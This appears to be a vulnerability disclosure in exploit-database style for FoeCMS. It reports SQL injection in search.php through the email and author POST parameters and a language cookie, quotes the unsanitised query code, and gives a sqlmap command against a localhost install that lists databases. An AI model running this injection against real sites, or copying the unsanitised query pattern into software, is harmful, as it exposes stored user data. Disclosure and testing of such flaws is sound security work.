##################################################################################################
#Exploit Title : FoeCMS SQL inection vulnerability in search page
#Author        : Jagriti Sahu
#Vendor        : http://foecms.com/
#Download Link : 
https://github.com/themarioga/FoeCMS/archive/master.zip
#Date          : 11/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
#Greez to      : ALL Indian hackers
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
FoeCMS suffers from remote SQL injection vulnerability which can be 
exploited by hacker to gain information stored in database
there are multiple parameters which are affected from this 
vulnerability
like search.php page
parameters email,name and cookie parameter foecms_lang=2 does not check 
for user supplied data and vulnerable to remote SQL injection

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
in page search.php

on line 32
          $u_row = fetchUserBy("username", $_POST["author"]);
          $_POST["author"] parameter is not checked by code before 
passing to sql query
on line 34
$u_res = mysql_query("SELECT * FROM ".$MYSQL_PREFIX."account WHERE 
email='".$_POST["email"]."'");
$_POST["email"] parameter is getting pass to SQL query without 
filteration


//////////////////////////////
///  Proof of Concept: -
//////////////////////////////

cms is installed on location
http://localhost/foecms
following payload with SQLmap give me confirmation of SQL injection 
existance

./sqlmap.py  -u http://localhost/foecms/search.php 
--data=name=&author=&email=p@gmail.com -p email --dbs